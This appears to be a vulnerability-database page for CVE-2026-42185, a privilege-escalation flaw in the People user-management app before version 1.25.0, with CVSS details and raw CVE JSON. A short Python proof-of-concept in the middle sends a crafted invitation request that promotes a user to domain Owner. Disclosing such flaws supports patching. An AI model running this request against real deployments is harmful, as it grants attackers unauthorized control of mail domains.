Security Vulnerability Report
中文
CVE-2026-42185 CVSS 5.5 MEDIUM

CVE-2026-42185

Published: 2026-05-08 20:16:31
Last Modified: 2026-05-08 20:16:31
Source: [email protected]

Description

People is an application to handle users and teams, and distribute permissions across La Suite. Prior to version 1.25.0, a user holding the Administrator role on a mail domain could send a crafted invitation request to promote any existing user (including users with no current domain access) to the Owner role. The exploit requires a single authenticated HTTP request and grants full domain ownership immediately, without any acceptance step from the target. This issue has been patched in version 1.25.0.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

People < 1.25.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit for CVE-2026-42185: Privilege Escalation in People # Note: Requires authentication as a Domain Administrator. target_url = "https://<target-domain>/api/invitations" headers = { "Authorization": "Bearer <ADMIN_TOKEN>", "Content-Type": "application/json" } # Malicious payload to promote user to Owner payload = { "user_id": "<target_user_id>", "role": "Owner", "domain_id": "<domain_id>" } response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Success: User privileges escalated to Owner.") else: print(f"[-] Failed: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42185", "sourceIdentifier": "[email protected]", "published": "2026-05-08T20:16:31.290", "lastModified": "2026-05-08T20:16:31.290", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "People is an application to handle users and teams, and distribute permissions across La Suite. Prior to version 1.25.0, a user holding the Administrator role on a mail domain could send a crafted invitation request to promote any existing user (including users with no current domain access) to the Owner role. The exploit requires a single authenticated HTTP request and grants full domain ownership immediately, without any acceptance step from the target. This issue has been patched in version 1.25.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://github.com/suitenumerique/people/commit/6a51b96d8e907483fa8fc489d8714cc35fb4099b", "source": "[email protected]"}, {"url": "https://github.com/suitenumerique/people/releases/tag/v1.25.0", "source": "[email protected]"}, {"url": "https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf", "source": "[email protected]"}, {"url": "https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.